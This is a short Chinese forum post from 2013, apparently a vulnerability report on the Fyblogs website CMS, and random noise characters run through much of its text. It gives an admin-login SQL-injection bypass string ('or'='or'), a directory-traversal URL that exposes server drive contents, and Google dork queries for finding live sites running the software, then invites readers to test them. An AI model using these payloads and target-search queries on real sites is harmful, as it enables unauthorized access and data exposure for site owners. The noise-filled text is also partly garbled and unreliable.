漏洞类型: 未授权访问/权限绕过4 ^6 ~3 o7 {$ l$ @" |1 N, @- O! j! E
# L2 Z' f4 p4 r0 V
简要描述:9 T* M8 j/ @3 m6 L4 v" ?# T
& `: s8 X+ @+ S0 Q0 c
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 ]) o; @( @4 Q5 Q1 \ S) O0 X" c; o; `
详细说明:0 w% o: C9 d X* G3 @' }: Y# q
: A: o5 R, E) m. A8 e/ w- `
后台万能密码 'or'='or'+ x9 w' Z: H4 f( O1 {
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!* e( \3 X6 |4 u7 M& p
admin/uploadfile.asp?currentFolder=/upfiles/../) m O- J1 ~0 k# b8 u
6 q+ a* R6 L* P: T: n漏洞证明:; \+ U) F2 @1 j8 r
$ W$ t) T# C$ {3 q谷歌:inurl:type.asp?id=1 新闻中心; P5 O5 Q6 t- }4 ~9 Q
或者 :inurl:download_ok.asp?
( ^$ o/ {) |4 Y1 X4 Q) `8 l9 q, v9 g0 \
$ B% H9 g8 F) y/ Q' ~/ E8 m( \可以测试8 Z3 V& _4 \# B; S! P# o
) d, Q3 g4 Q* r1 W) o+ n+ K) I; z9 u1 R- Q
|
发表于 2013-3-7 13:07:46
收藏
支持
反对